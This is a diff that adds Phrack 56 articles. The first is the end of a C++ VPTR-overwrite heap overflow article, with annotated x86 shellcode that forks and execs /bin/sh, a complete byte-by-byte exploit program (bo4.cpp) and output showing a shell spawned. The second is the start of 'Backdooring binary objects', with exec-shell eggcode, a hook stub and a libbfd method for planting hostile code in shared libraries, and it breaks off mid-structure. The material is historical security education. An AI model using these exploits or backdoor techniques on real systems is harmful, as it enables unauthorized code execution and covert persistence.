+       S represents the address in our buffer of the "/bin/sh" string.
+       0 represented 90h bytes, who will be initialized to 00h at run time 
+        (necessary for exec ()).
+       /bin/sh represents the "/bin/sh" string, without any 00h termination
+        byte.
+       A represents a byte of our shellcode (principally to run the shell, then
+        to copy the stackcode on the stack and to run it).
+       B represents a byte of our stackcode (principally to reset our buffer
+        with a new string, and to run the original method to continue the
+        execution of the original program.
+       newstring represents the "newstring" string, that will be recopied in
+        the buffer after execution of the shell, to continue the execution.
+       V represents a byte of the VPTR, that must point back to the beginning
+        of our buffer (to our VTABLE).
+       L represents the byte that will be copy after the VPTR, and that will
+        be a 0hh byte.
+
+In a more detailed manner, here are the content of our shellcode and
+stackcode:
+
+
+pushl  %ebp                             //save existing EBP
+movl   %esp,%ebp                        //stack frame creation
+xorl   %eax,%eax                        //EAX=0
+movb   $0x31,%al                        //EAX=$StackCodeSize (size of the code
+                                        // who will be copied to the stack)
+subl   %eax,%esp                        //creation of a local variable to
+                                        // contain our stackcode
+pushl  %edi
+pushl  %esi
+pushl  %edx
+pushl  %ecx
+pushl  %ebx                             //save registers
+pushf                                   //save flags
+cld                                     //direction flag=incrementation
+xorl   %eax,%eax                        //EAX=0
+movw   $0x101,%ax                       //EAX=$AddThis (value added for
+                                        // calculating This on the stack)
+subl   %eax,0x8(%ebp)                   //we substract this value from the
+                                        // current This value on the stack, to
+                                        // restore the original This.
+xorl   %eax,%eax                        //EAX=0
+movl   $0x804a874,%edi                  //EDI=$BufferAddress+$NullOffset
+                                        // (address of NULL dword in our
+                                        // buffer)
+stosl  %eax,%es:(%edi)                  //we write this NULL in the buffer
+movl   $0x804a87f,%edi                  //EDI=$BufferAddress+$BinSh00Offset
+                                        // (address of 00h from "/bin/sh")
+stosb  %al,%es:(%edi)                   //we write this 00h at the end of
+                                        // "/bin/sh"
+movb   $0x2,%al
+int    $0x80                            //fork()
+xorl   %edx,%edx                        //EDX=0
+cmpl   %edx,%eax
+jne    0x804a8c1                        //if EAX=0 then jump to LFATHER
+                                        // (EAX=0 if father process)
+
+movb   $0xb,%al                         //else we are the child process
+movl   $0x804a878,%ebx                  //EBX=$BufferAddress+$BinShOffset
+                                        // (address of "/bin/sh")
+movl   $0x804a870,%ecx			//ECX=$BufferAddress+$BinShAddressOffset
+                                        // (adresse of address of "/bin/sh")
+xorl   %edx,%edx                        //EDX=0h (NULL)
+int    $0x80                            //exec() "/bin/sh"
+
+LFATHER:
+movl   %edx,%esi                        //ESI=0
+movl   %edx,%ecx			//ECX=0
+movl   %edx,%ebx			//EBX=0
+notl   %ebx				//EBX=0xFFFFFFFF
+movl   %edx,%eax			//EAX=0
+movb   $0x72,%al			//EAX=0x72
+int    $0x80                            //wait() (wait an exit from the shell)
+xorl   %ecx,%ecx			//ECX=0
+movb   $0x31,%cl			//ECX=$StackCodeSize
+movl   $0x804a8e2,%esi			//ESI=$BufferAddress+$StackCodeOffset
+                                        // (address of beginning of the
+                                        // stackcode)
+movl   %ebp,%edi                        //EDI point to the end of or local
+                                        // variable
+subl   %ecx,%edi                        //EDI point to the beginning of or
+                                        // local variable
+movl   %edi,%edx                        //EDX also point to the beginning of
+                                        // or local variable
+repz movsb %ds:(%esi),%es:(%edi)        //copy our stackcode into our local
+                                        // variable on the stack
+jmp    *%edx                            //run our stackcode on the stack
+
+stackcode:
+movl   $0x804a913,%esi			//ESI=$BufferAddress+$NewBufferOffset
+                                        // (point to the new string we want to
+                                        // rewrite in the buffer)
+movl   $0x804a860,%edi                  //EDI=$BufferAddress (point to the
+                                        // beginning of our buffer)
+xorl   %ecx,%ecx			//ECX=0
+movb   $0x9,%cl                         //ECX=$NewBufferSize (length of the
+                                        // new string)
+repz movsb %ds:(%esi),%es:(%edi)        //copy the new string at the
+                                        // beginning of our buffer
+xorb   %al,%al				//AL=0
+stosb  %al,%es:(%edi)                   //put a 00h at the end of the string
+movl   $0x804a960,%edi			//EDI=$BufferAddress+$VPTROffset
+                                        // (address of VPTR)
+movl   $0x8049730,%eax                  //EAX=$VTABLEAddress (adresse of the
+                                        // original VTABLE from our class)
+movl   %eax,%ebx			//EBX=$VTABLEAddress
+stosl  %eax,%es:(%edi)                  //correct the VPTR to point to the
+                                        // original VTABLE
+movb   $0x29,%al                        //AL=$LastByte (byte following the
+                                        // VPTR in memory)
+stosb  %al,%es:(%edi)                   //we correct this byte
+movl   0xc(%ebx),%eax			//EAX=*VTABLEAddress+IAddress*4
+                                        // (EAX take the address of the
+                                        // original method in the original
+                                        // VTABLE).
+popf
+popl   %ebx
+popl   %ecx
+popl   %edx
+popl   %esi
+popl   %edi                             //restore flags and registers
+movl   %ebp,%esp
+popl   %ebp                             //destroy the stack frame
+jmp    *%eax                            //run the original method
+
+
+We now must code a BufferOverflow() function that is going to "compile" us the 
+shellcode and the stackcode, and to create the structure of our buffer.
+Here are parameters that we should pass to this function:
+- BufferAddress = address of our buffer in memory.
+- IAddress = index in the VTABLE of the 1st method that will be executed.
+- VPTROffset = offset in our buffer of the VPTR to overwrite.
+- AddThis = value that will be added to the This pointer on the stack, because 
+of the "strange handling".
+- VTABLEAddress = address of the original VTABLE of our class (coded in the 
+executable).
+- *NewBuffer = a pointer to the new chain that we want to place in our buffer 
+to normally continue the program.
+- LastByte = the original byte following the VPTR in memory, that is
+ overwritten at the time of the copy of our buffer in the original buffer,
+ because of the 00h.
+
+Here is the resulting code of the program (bo4.cpp):
+
+
+#include <stdio.h>
+#include <string.h>
+#include <malloc.h>
+
+#define BUFFERSIZE 256
+
+class BaseClass { 
+private:
+ char Buffer[BUFFERSIZE];
+public:
+ void SetBuffer(char *String) {
+  strcpy(Buffer,String);
+ }
+ virtual void PrintBuffer() {
+  printf("%s\n",Buffer);
+ }
+};
+
+class MyClass1:public BaseClass {
+public:
+ void PrintBuffer() {
+  printf("MyClass1: ");
+  BaseClass::PrintBuffer();
+ }
+};
+
+class MyClass2:public BaseClass {
+public:
+ void PrintBuffer() {
+  printf("MyClass2: ");
+  BaseClass::PrintBuffer();
+ }
+};
+
+char *BufferOverflow(unsigned long BufferAddress,int IAddress,int VPTROffset,
+ unsigned short AddThis,unsigned long VTABLEAddress,char *NewBuffer,char LastByte) {
+
+ char *CBuf;
+ unsigned long *LBuf;
+ unsigned short *SBuf;
+ char BinShSize,ShellCodeSize,StackCodeSize,NewBufferSize;
+ unsigned long i,  
+  MethodAddressOffset,BinShAddressOffset,NullOffset,BinShOffset,BinSh00Offset,
+  ShellCodeOffset,StackCodeOffset,
+  NewBufferOffset,NewBuffer00Offset,
+  LastByteOffset;  
+ char *BinSh="/bin/sh";
+ 
+ CBuf=(char*)malloc(VPTROffset+4+1);
+ LBuf=(unsigned long*)CBuf;
+ 
+ BinShSize=(char)strlen(BinSh);
+ ShellCodeSize=0x62;
+ StackCodeSize=0x91+2-0x62;
+ NewBufferSize=(char)strlen(NewBuffer);
+ 
+ MethodAddressOffset=IAddress*4;
+ BinShAddressOffset=MethodAddressOffset+4;
+ NullOffset=MethodAddressOffset+8;
+ BinShOffset=MethodAddressOffset+12;
+ BinSh00Offset=BinShOffset+(unsigned long)BinShSize;
+ ShellCodeOffset=BinSh00Offset+1;
+ StackCodeOffset=ShellCodeOffset+(unsigned long)ShellCodeSize;
+ NewBufferOffset=StackCodeOffset+(unsigned long)StackCodeSize;
+ NewBuffer00Offset=NewBufferOffset+(unsigned long)NewBufferSize;
+ LastByteOffset=VPTROffset+4;
+
+ for (i=0;i<VPTROffset;i++) CBuf[i]='\x90'; //NOPs
+ SBuf=(unsigned short*)&LBuf[2];
+ *SBuf=AddThis; //added  to the This pointer on the stack
+ 
+ LBuf=(unsigned long*)&CBuf[MethodAddressOffset];
+ *LBuf=BufferAddress+ShellCodeOffset; //shellcode's address
+ 
+ LBuf=(unsigned long*)&CBuf[BinShAddressOffset];
+ *LBuf=BufferAddress+BinShOffset; //address of "/bin/sh"
+
+ memcpy(&CBuf[BinShOffset],BinSh,BinShSize); //"/bin/sh" string
+
+ //shellcode:
+  
+ i=ShellCodeOffset;
+ CBuf[i++]='\x55';                                   //pushl %ebp
+ CBuf[i++]='\x89';CBuf[i++]='\xE5';                  //movl %esp,%ebp
+ CBuf[i++]='\x31';CBuf[i++]='\xC0';                  //xorl %eax,%eax
+ CBuf[i++]='\xB0';CBuf[i++]=StackCodeSize;           //movb $StackCodeSize,%al
+ CBuf[i++]='\x29';CBuf[i++]='\xC4';                  //subl %eax,%esp
+ 
+ CBuf[i++]='\x57';                                   //pushl %edi
+ CBuf[i++]='\x56';                                   //pushl %esi
+ CBuf[i++]='\x52';                                   //pushl %edx 
+ CBuf[i++]='\x51';                                   //pushl %ecx 
+ CBuf[i++]='\x53';                                   //pushl %ebx  
+ CBuf[i++]='\x9C';                                   //pushf
+ 
+ CBuf[i++]='\xFC';                                   //cld
+
+ CBuf[i++]='\x31';CBuf[i++]='\xC0';                  //xorl %eax,%eax
+ CBuf[i++]='\x66';CBuf[i++]='\xB8';                  //movw $AddThis,%ax
+ SBuf=(unsigned short*)&CBuf[i];*SBuf=AddThis;i=i+2;
+ CBuf[i++]='\x29';CBuf[i++]='\x45';CBuf[i++]='\x08'; //subl %eax,0x8(%ebp)
+
+ CBuf[i++]='\x31';CBuf[i++]='\xC0';                  //xorl %eax,%eax
+ 
+ CBuf[i++]='\xBF';                        //movl $BufferAddress+$NullOffset,%edi
+ LBuf=(unsigned long*)&CBuf[i];*LBuf=BufferAddress+NullOffset;i=i+4;  
+ CBuf[i++]='\xAB';                                   //stosl %eax,%es:(%edi)
+
+ CBuf[i++]='\xBF';                     //movl $BufferAddress+$BinSh00Offset,%edi
+ LBuf=(unsigned long*)&CBuf[i];*LBuf=BufferAddress+BinSh00Offset;i=i+4;
+ CBuf[i++]='\xAA';                                   //stosb %al,%es:(%edi)
+
+ CBuf[i++]='\xB0';CBuf[i++]='\x02';                  //movb $0x2,%al
+ CBuf[i++]='\xCD';CBuf[i++]='\x80';                  //int $0x80 (fork())
+ 
+ CBuf[i++]='\x31';CBuf[i++]='\xD2';                  //xorl %edx,%edx
+ CBuf[i++]='\x39';CBuf[i++]='\xD0';                  //cmpl %edx,%eax
+ CBuf[i++]='\x75';CBuf[i++]='\x10';                  //jnz +$0x10 (-> LFATHER)
+
+ CBuf[i++]='\xB0';CBuf[i++]='\x0B';                  //movb $0xB,%al
+ CBuf[i++]='\xBB';                       //movl $BufferAddress+$BinShOffset,%ebx
+ LBuf=(unsigned long*)&CBuf[i];*LBuf=BufferAddress+BinShOffset;i=i+4; 
+ CBuf[i++]='\xB9';                //movl $BufferAddress+$BinShAddressOffset,%ecx
+ LBuf=(unsigned long*)&CBuf[i];*LBuf=BufferAddress+BinShAddressOffset;i=i+4; 
+ CBuf[i++]='\x31';CBuf[i++]='\xD2';                  //xorl %edx,%edx
+ CBuf[i++]='\xCD';CBuf[i++]='\x80';                  //int $0x80 (execve())
+ 
+                                                     //LFATHER:
+ CBuf[i++]='\x89';CBuf[i++]='\xD6';                  //movl %edx,%esi
+ CBuf[i++]='\x89';CBuf[i++]='\xD1';                  //movl %edx,%ecx
+ CBuf[i++]='\x89';CBuf[i++]='\xD3';                  //movl %edx,%ebx
+ CBuf[i++]='\xF7';CBuf[i++]='\xD3';                  //notl %ebx
+ CBuf[i++]='\x89';CBuf[i++]='\xD0';                  //movl %edx,%eax
+ CBuf[i++]='\xB0';CBuf[i++]='\x72';                  //movb $0x72,%al
+ CBuf[i++]='\xCD';CBuf[i++]='\x80';                  //int $0x80 (wait())
+ 
+ CBuf[i++]='\x31';CBuf[i++]='\xC9';                  //xorl %ecx,%ecx
+ CBuf[i++]='\xB1';CBuf[i++]=StackCodeSize;           //movb $StackCodeSize,%cl
+
+ CBuf[i++]='\xBE';                   //movl $BufferAddress+$StackCodeOffset,%esi
+ LBuf=(unsigned long*)&CBuf[i];*LBuf=BufferAddress+StackCodeOffset;i=i+4; 
+
+ CBuf[i++]='\x89';CBuf[i++]='\xEF';                  //movl %ebp,%edi
+ CBuf[i++]='\x29';CBuf[i++]='\xCF';                  //subl %ecx,%edi
+ CBuf[i++]='\x89';CBuf[i++]='\xFA';                  //movl %edi,%edx
+ 
+ CBuf[i++]='\xF3';CBuf[i++]='\xA4';           //repz movsb %ds:(%esi),%es:(%edi)
+
+ CBuf[i++]='\xFF';CBuf[i++]='\xE2';                  //jmp *%edx (stackcode)
+
+ //stackcode:
+ 
+ CBuf[i++]='\xBE';                   //movl $BufferAddress+$NewBufferOffset,%esi
+ 
+ LBuf=(unsigned long*)&CBuf[i];*LBuf=BufferAddress+NewBufferOffset;i=i+4; 
+ CBuf[i++]='\xBF';                                   //movl $BufferAddress,%edi
+ LBuf=(unsigned long*)&CBuf[i];*LBuf=BufferAddress;i=i+4; 
+ CBuf[i++]='\x31';CBuf[i++]='\xC9';                  //xorl %ecx,%ecx
+ CBuf[i++]='\xB1';CBuf[i++]=NewBufferSize;           //movb $NewBufferSize,%cl
+ CBuf[i++]='\xF3';CBuf[i++]='\xA4';           //repz movsb %ds:(%esi),%es:(%edi)
+
+ CBuf[i++]='\x30';CBuf[i++]='\xC0';                  //xorb %al,%al
+ CBuf[i++]='\xAA';                                   //stosb %al,%es:(%edi)
+
+ CBuf[i++]='\xBF';                        //movl $BufferAddress+$VPTROffset,%edi
+ LBuf=(unsigned long*)&CBuf[i];*LBuf=BufferAddress+VPTROffset;i=i+4; 
+ CBuf[i++]='\xB8';                                   //movl $VTABLEAddress,%eax
+ LBuf=(unsigned long*)&CBuf[i];*LBuf=VTABLEAddress;i=i+4; 
+ CBuf[i++]='\x89';CBuf[i++]='\xC3';                  //movl %eax,%ebx
+ CBuf[i++]='\xAB';                                   //stosl %eax,%es:(%edi)
+
+ CBuf[i++]='\xB0';CBuf[i++]=LastByte;                //movb $LastByte,%al
+ CBuf[i++]='\xAA';                                   //stosb %al,%es:(%edi)
+
+ CBuf[i++]='\x8B';CBuf[i++]='\x43';
+ CBuf[i++]=(char)4*IAddress;                       //movl $4*Iaddress(%ebx),%eax
+
+ CBuf[i++]='\x9D';                                   //popf
+ CBuf[i++]='\x5B';                                   //popl %ebx
+ CBuf[i++]='\x59';                                   //popl %ecx
+ CBuf[i++]='\x5A';                                   //popl %edx
+ CBuf[i++]='\x5E';                                   //popl %esi
+ CBuf[i++]='\x5F';                                   //popl %edi
+
+ CBuf[i++]='\x89';CBuf[i++]='\xEC';                  //movl %ebp,%esp
+ CBuf[i++]='\x5D';                                   //popl %ebp
+ 
+ CBuf[i++]='\xFF';CBuf[i++]='\xE0';                  //jmp *%eax
+ 
+ memcpy(&CBuf[NewBufferOffset],NewBuffer,(unsigned long)NewBufferSize);
+  //insert the new string into the buffer
+ 
+ LBuf=(unsigned long*)&CBuf[VPTROffset];
+ *LBuf=BufferAddress; //address of our VTABLE
+
+ CBuf[LastByteOffset]=0; //last byte (for strcpy())
+
+ return CBuf;
+}
+
+void main() {
+ BaseClass *Object[2];
+ unsigned long *VTABLEAddress;
+
+ Object[0]=new MyClass1;
+ Object[1]=new MyClass2; 
+
+ printf("Object[0] address = %X\n",(unsigned long)&(*Object[0])); 
+ VTABLEAddress=(unsigned long*) ((char*)&(*Object[0])+256);
+ printf("VTable address = %X\n",*VTABLEAddress);
+ 
+ Object[0]->SetBuffer(BufferOverflow((unsigned long)&(*Object[0]),3,BUFFERSIZE,
+  0x0101,*VTABLEAddress,"newstring",0x29)); 
+  
+ Object[1]->SetBuffer("string2");
+ Object[0]->PrintBuffer();
+ Object[1]->PrintBuffer();
+}
+
+
+Now, we are ready to compile and to check...
+
+rix@pentium:~/BO > gcc -o bo4 bo4.cpp
+rix@pentium:~/BO > bo4
+adresse Object[0] = 804A860
+adresse VTable = 8049730
+sh-2.02$ exit
+exit
+MyClass1: newstring
+MyClass2: string2
+rix@pentium:~/BO >
+
+And as foreseen, our shell executes himself, then the program continue its
+execution, with a new string in the buffer ("newstring ")!!!
+
+
+Conclusion
+==========
+To summarize, let's note that the basis technique requires the following 
+conditions for success:
+- a buffer of a certain minimal size
+- suid program
+- executable heap and/or executable stack (according to techniques)
+- to know the address of the beginning of the buffer (on the heap or on the 
+   stack)
+- to know the offset from the beginning of the buffer of the VPTR (fixed for
+   all executions)
+- to know the offset in the VTABLE of the pointer to the 1st method executed 
+   after the overflow (fixed for all executions)
+- to know the address of the VTABLE if we want to continue the execution of
+   the program correctly.
+
+I hope this article will have once again show you how pointers (more and more 
+used in modern programming ) can be very dangerous in some particular cases. 
+
+We notice that some languages as powerful as C++, always include some 
+weakness, and that this is not with a particular language or tools that a 
+program becomes secured, but mainly because of the knowledge and expertise
+of its conceivers...
+
+Thanks to: route, klog, mayhem, nite, darkbug.
+
+|EOF|-------------------------------------------------------------------------|
diff --git a/phrack56/9.txt b/phrack56/9.txt
new file mode 100644
index 0000000..d1934ed
--- /dev/null
+++ b/phrack56/9.txt
@@ -0,0 +1,947 @@
+                      - P H R A C K   M A G A Z I N E -
+
+                            Volume 0xa Issue 0x38
+                                  05.01.2000
+                                  0x09[0x10]
+
+|------------------------- BACKDOORING BINARY OBJECTS ------------------------|
+|-----------------------------------------------------------------------------|
+|-------------------------- klog <klog@promisc.org> --------------------------|
+
+
+----|  Introduction
+
+Weakening a system in order to keep control over it (or simply to alter
+some of its functionality) has been detailed in many other papers.  From
+userland code modification to trojan kernel code, most of the common
+backdooring techniques are either too dirty, or just not portable enough.
+How can we create a standard and clean way to backdoor binary files?  The
+right answer to this question is just the same as for "How can we create a
+standard and clean way to debug and analyze binary files?".  The GNU Project
+found the answer even before we could ask the question.
+
+	ipdev:~$ ldd /usr/bin/nm
+        libbfd.so.2.6.0.14 => /usr/lib/libbfd.so.2.6.0.14
+        libc.so.5 => /lib/libc.so.5.3.12
+	ipdev:~$
+
+
+----|  The BFD.
+
+The Binary File Descriptor.  Becoming the de facto standard in binary file
+analysis, manipulation and linking, libbfd will support about any file format
+and architecture you can own.  Although it is mostly intended for ELF support,
+its frontend will enable you to transparently modify objects with various
+formats like COFF, AOUT or IEEE.  At this very moment, it is probably your
+best bet for shared library backdooring.  
+
+
+----|  Overview
+
+The following article will show you the bliss of backdoor portability by
+describing both static and shared ELF object backdooring methods.  It will be
+divided into the logical steps of the operation which are the code writing
+procedure, the code insertion procedure, and finally, the hooking procedure.
+
+
+QUICK NOTE:
+
+Before diving in, the reader needs to know a few things...  First of all,
+libbfd is *usually* found on most systems, including linux, and *bsd.  If it
+is not, it is included in the GNU binutils distribution.  Fetch it.  Also,
+it is important to know that libbfd relies on the libiberty library, which
+you would be lucky to find on your target host.  It is small, and you might
+want to consider making it a part of your portable backdooring toolkit.
+Finally, it might happen that BFD does *not* provide the required facilities
+to completely insert our malicious code in specific situations.  Thus, we
+might have to use object format specific techniques in order to complete our
+goal.
+
+
+----|  Writing the hostile code
+
+This section will look familiar to most of you shellcode writers out there.  As
+a matter of fact, it is probably the most painful step in the portability of
+our backdooring technique.  However, it should be reasonably painfree for the
+average hacker who has some knowledge of assembly on common architectures.  
+
+The easiest way to write our code would be to do it in asm, using the
+"eggcode" method, which enables us to insert the hostile code in unknown
+environments without any fear of breaking its internal links.  By using
+relative addressing, it becomes possible to write code which would be
+completely independent from its environment, as seen in most exploit
+shellcodes.  An example of eggcode (for those who never touched one before)
+would be the following: 
+
+	ipdev:~/tmp/bfd$ cat eggcode.s
+
+	.text
+	        .align 4
+	.globl main
+	        .type    main,@function
+	main:
+	        xorl %eax,%eax
+	        xorl %edx,%edx
+	        movb $0xb,%al
+	        jmp .jumpme
+	.callme:
+	        popl %ebx
+	        leal 0x8(%ebx),%ecx
+	        movl %ebx,0x8(%ebx)
+	        movl %edx,0xc(%ebx)
+	        int $0x80
+	.jumpme:
+	        call .callme
+		.string "/bin/sh\0"
+	
+	ipdev:~/tmp/bfd$ 
+	
+However, when it comes to backdoors, where function call redirection is often
+(always?) involved, such a technique becomes inapplicable.  As a matter of
+fact, that kind of backdoor would render the hooked function unusable, since
+no redirection to the original function can be done on specific conditions.
+For that purpose, we will have to find a way to refer to functions located
+in our target object.
+
+Fortunately for us, there is a pretty easy way to do such a thing.  The only
+condition is that the referenced symbol must be located within the library
+we are backdooring (not imported from somewhere else).  Let's suppose that we
+want to backdoor a function called huhu() in some library, and that the
+backdoor will have to redirect the call to another function called haha()
+within the same library.  In this example, haha() will be passed a string
+which will be printed on the screen.
+
+Before being able to find out what address we want to call from our backdoor,
+we will have to determine the position of haha() within the targeted
+library...
+
+	ipdev:~/tmp/bfd$ nm lib.so
+	00001214 A _DYNAMIC
+	00001208 A _GLOBAL_OFFSET_TABLE_
+	00001264 A __bss_start
+	00001264 A _edata
+	00001264 A _end
+	00000200 A _etext
+	000001d8 t gcc2_compiled.
+	000001d8 T haha
+	000001ec T huhu
+	         U printf
+	ipdev:~/tmp/bfd$
+
+We can see that it will map into memory at address 0x1d8.  To deduce the
+address we want to call in our backdoor, we will have to consider the code
+relocation which will be performed when inserting our backdoor into the
+library.  The resulting address would be 1d8-[reloc_offset].  That in mind,
+le'ts write the eggcode of our backdoor:
+
+	ipdev:~/tmp/bfd$ cat > eggcode.s
+
+	.text
+	        .align 4
+	.globl main
+	        .type    main,@function
+	main:
+	        nop
+	        nop
+	        nop
+	        nop                  
+	        nop
+	        nop
+	        pushl %ebp
+	        movl %esp,%ebp
+	        jmp string
+	callit: call 0x1d8-0x1214-0x10
+	        addl $4,%esp
+	        movl %ebp,%esp
+	        popl %ebp
+	        ret
+	string:
+	        call callit
+	        .string "whore\n"
+	
+	^D
+	ipdev:~/tmp/bfd$
+
+In this example, the relocation offset of our code is 0x1214.  The subtraction
+of 0x10 is required because the called address in the code is considered by
+the compiler as relative to the position of the call instruction, when we call
+an absolute address.  As you probably guessed, the call instruction ends at
+address 0x10 within the eggcode.  Also, you might have noticed all the nops at
+the beginning of the code.  This is purely to avoid any padding or
+miscalculation problem.  As in all exploit writing, we are never careful
+enough.
+
+
+----|  Inserting the hostile code
+
+Now comes the part where libbfd will become useful.  As a matter of fact,
+bfds have the capability of describing a complete binary file (from head
+to tail) more or less quite accurately.  Accuracy, in this case, refers to the
+ability to interpret various data from the object file, which is highly
+influenced by the transparency required by libbfd when it comes to such a task.
+Thus, multiple format-specific features will be sacrificed in order to
+protect the portability of the bfd interface.  However, we do not need to
+worry about that for the moment, since our task strictly consists of malicious
+code insertion.  Fortunately, our trojan insertion method will only rely on
+the presence of multiple sections within an object, which is common on most
+architectures.  Before proceeding to this, we will have to take a look at
+what APIs libbfd offers us.
+
+At the time of this writing (bfd version < 3.0), libbfd does not permit direct
+modification of an object file.  The two most useful functions libbfd does
+offer us are bfd_openr() and bfd_openw().  They both require the object file
+name and the architecture type as arguments, and they both return a descriptor
+to the allocated bfd.  When a bfd is being opened in read mode (openr), none
+of its structures can be dumped into the physical file.  On the other hand,
+when it is opened in write mode (openw), none if its data can be read.  For
+this reason, in order to insert our backdoor, we will have to copy the binary
+file, section by section, and perform the data insertion while copying the
+host section of our target file.
+
+The process of copying the object file is composed of several steps, including
+the reproduction of the file's start address, flags, architecture, symbol
+table, debugging information and various sections.  Since a sample backdooring
+program code called shoveit.c is appended at the end of this article, we
+will only take a look at the interesting functions of libbfd when it comes
+to inserting our backdoor into the destination object (the hooking of the
+various symbol tables is described in the next sections).  For informational
+purposes, let's take a look at the transparent libbfd view of a binary
+file section:
+
+	typedef struct sec
+	{
+		const char *name;
+		int index;
+		struct sec *next;
+		flagword flags;
+	#define	SEC_NO_FLAGS        0x000
+	#define SEC_ALLOC           0x001
+	#define SEC_LOAD            0x002
+	#define SEC_RELOC           0x004
+	#define SEC_BALIGN          0x008
+	#define SEC_READONLY        0x010
+	#define SEC_CODE            0x020
+	#define SEC_DATA            0x040
+	       	unsigned int user_set_vma : 1;
+	       	unsigned int reloc_done : 1;
+	       	unsigned int linker_mark : 1;
+		bfd_vma vma;
+		bfd_vma lma;
+		bfd_size_type _cooked_size;
+		bfd_size_type _raw_size;
+		bfd_vma output_offset;
+		struct sec *output_section;
+		unsigned int alignment_power;
+		struct reloc_cache_entry *relocation;
+		struct reloc_cache_entry **orelocation;
+		unsigned reloc_count;
+		file_ptr filepos;
+		file_ptr rel_filepos;
+		file_ptr line_filepos;
+		PTR userdata;
+	   	unsigned char *contents;
+	   	alent *lineno; 
+	   	unsigned int lineno_count;
+	   	file_ptr moving_line_filepos;
+	   	int target_index;
+	   	PTR used_by_bfd;
+	   	struct relent_chain *constructor_chain;
+	   	bfd *owner;
+	   	struct symbol_cache_entry *symbol;
+	   	struct symbol_cache_entry **symbol_ptr_ptr;
+	   	struct bfd_link_order *link_order_head;
+	   	struct bfd_link_order *link_order_tail;
+	} asection ;
+
+
+All the bfd represented sections of a binary file are linked together with
+the *next pointer, and point back to their parent bfd with a *owner pointer.
+Most of the other fields are used either by libbfd's internal procedures,
+or by the frontend macros.  They are pretty much self-explanatory; however,
+for more information on what a given field is intended for, refer to the bfd.h
+header file.
+
+In order to copy sections from one bfd to another, you first must register a
+handler with the bfd_map_over_sections() function, which will be executed for
+each section of the input bfd.  This mapping function must be passed the bfd of
+the file in question, and a pointer to the handling function.  An optional
+"obj" pointer can also be passed to this handling function, which must have
+the following prototype:
+
+	handler(bfd *, asection *, void *);
+
+In order to first create the destination sections which will correspond to the
+sections of our source object, we will register a setup_section() function,
+which will set each destination section with its respective vma, lma, size,
+alignment and flags.  As you can see in the code below, we must pay particular
+attention to keep enough free space in the section which will host our hostile
+code such that both our backdoor and the original section will comfortably fit.
+Also, once the backdoor has been placed into a section, all of the following
+section's vma and lma are readjusted so that our hostile code will not be
+overwritten by those sections once mapped into virtual memory.
+
+Once the creation of our destination sections is done, we will have to copy
+the symbol table of our source file, which must be done before any section
+content is reproduced.  As was said before, this will be examined in the
+following sections. 
+
+Finally, we are ready to copy the data from one section to its respective
+destination (which is performed by the copy_section() handler in the code
+below).  Data can be read from and written to a bfd section by using the
+bfd_get_section_contents and bfd_set_section_contents respectively.  Both
+of these functions require the following arguments:
+
+	- the target/source bfd,
+	- section pointers,
+	- a pointer to the buffer (which will be filled with/dumped to the
+ 	  pointed section),
+	- the offset within the section,
+	- the size of the buffer.
+
+The data will be physically dumped into the object file once the bfd_close()
+function has been called.
+
+In a usual situation where a section is modified while being copied, we
+would have to relocate all the absolute references to symbols located in
+the sections following the altered section.  However, this operation can
+be avoided if the host section is among the last ones to be mapped into
+virtual memory, after which no other section is referenced to with
+absolute addressing.  If we take a quick look at the following example:
+
+	ipdev:~/tmp/bfd$ objdump -h /usr/lib/crt1.o
+
+	/usr/lib/crt1.o:     file format elf32-i386
+
+	Sections:
+	Idx Name          Size      VMA       LMA       File off  Algn
+	  0 .text         00000080  00000000  00000000  00000040  2**4
+	                  CONTENTS, ALLOC, LOAD, RELOC, READONLY, CODE
+	  1 .data         00000004  00000000  00000000  000000c0  2**2
+	                  CONTENTS, ALLOC, LOAD, DATA
+	  2 .bss          00000000  00000000  00000000  000000c4  2**2
+	                  ALLOC
+	ipdev:~/tmp/bfd$
+
+We would probably consider placing our code into the data section of the
+crt1.o program header.  However, the situation may become quite different
+for shared libraries:
+
+	ipdev:~/tmp/bfd$ objdump -h lib.so
+        
+        lib.so:     file format elf32-i386
+
+        Sections:
+        Idx Name          Size      VMA       LMA       File off  Algn
+          0 .hash         0000003c  00000094  00000094  00000094  2**2
+                          CONTENTS, ALLOC, LOAD, READONLY, DATA
+          1 .dynsym       000000a0  000000d0  000000d0  000000d0  2**2
+                          CONTENTS, ALLOC, LOAD, READONLY, DATA
+          2 .dynstr       00000050  00000170  00000170  00000170  2**0
+                          CONTENTS, ALLOC, LOAD, READONLY, DATA
+          3 .rel.text     00000018  000001c0  000001c0  000001c0  2**2
+                          CONTENTS, ALLOC, LOAD, READONLY, DATA
+          4 .text         00000028  000001d8  000001d8  000001d8  2**2
+                          CONTENTS, ALLOC, LOAD, READONLY, CODE
+          5 .rodata       00000006  00000200  00000200  00000200  2**0
+                          CONTENTS, ALLOC, LOAD, READONLY, DATA
+          6 .data         00000000  00001208  00001208  00000208  2**2
+                          CONTENTS, ALLOC, LOAD, DATA
+          7 .got          0000000c  00001208  00001208  00000208  2**2
+                          CONTENTS, ALLOC, LOAD, DATA
+          8 .dynamic      00000050  00001214  00001214  00000214  2**2
+                          CONTENTS, ALLOC, LOAD, DATA
+          9 .bss          00000000  00001264  00001264  00000264  2**2
+                          ALLOC
+         10 .note         00000014  00000000  00000000  00000264  2**0
+                          CONTENTS, READONLY
+         11 .comment      00000012  00000000  00000000  00000278  2**0
+                          CONTENTS, READONLY
+        ipdev:~/tmp/bfd$
+
+In this case, our best bet would probably be the global offset table
+(got) of the library, since we do not want to break absolute links in the
+preceding sections.  Whenever possible, we will try not to alter special
+sections like dynsym, dynstr or dynamic, which are often analyzed by tools
+like nm or objdump.
+
+
+----|  Standard symbol hooking
+
+Symbol alteration is probably the most important part of the backdooring
+procedure.  As a matter of fact, once our code is written and pushed into
+the target object, we must find a way to trigger its execution whenever
+the function we want to backdoor is called by a trusting process. 
+
+This first type of symbol hooking is quite interesting when we try to
+backdoor static objects.  The standard symbol table of a binary file
+is easily accessible thru the bfd interface, and therefore, this operation
+wont both be simple and portable.  Each of the symbols is canonically
+represented by libbfd like this:
+
+	typedef struct symbol_cache_entry
+	{
+	  	struct _bfd *the_bfd;
+	  	const char *name;
+	  	symvalue value;
+		flagword flags;
+	#define BSF_NO_FLAGS            0x00
+	#define BSF_LOCAL               0x01
+	#define BSF_GLOBAL              0x02
+	#define BSF_EXPORT              BSF_GLOBAL  
+	#define BSF_DEBUGGING           0x08
+	#define BSF_FUNCTION            0x10
+	#define BSF_KEEP                0x20
+	#define BSF_KEEP_G              0x40
+	#define BSF_WEAK                0x80
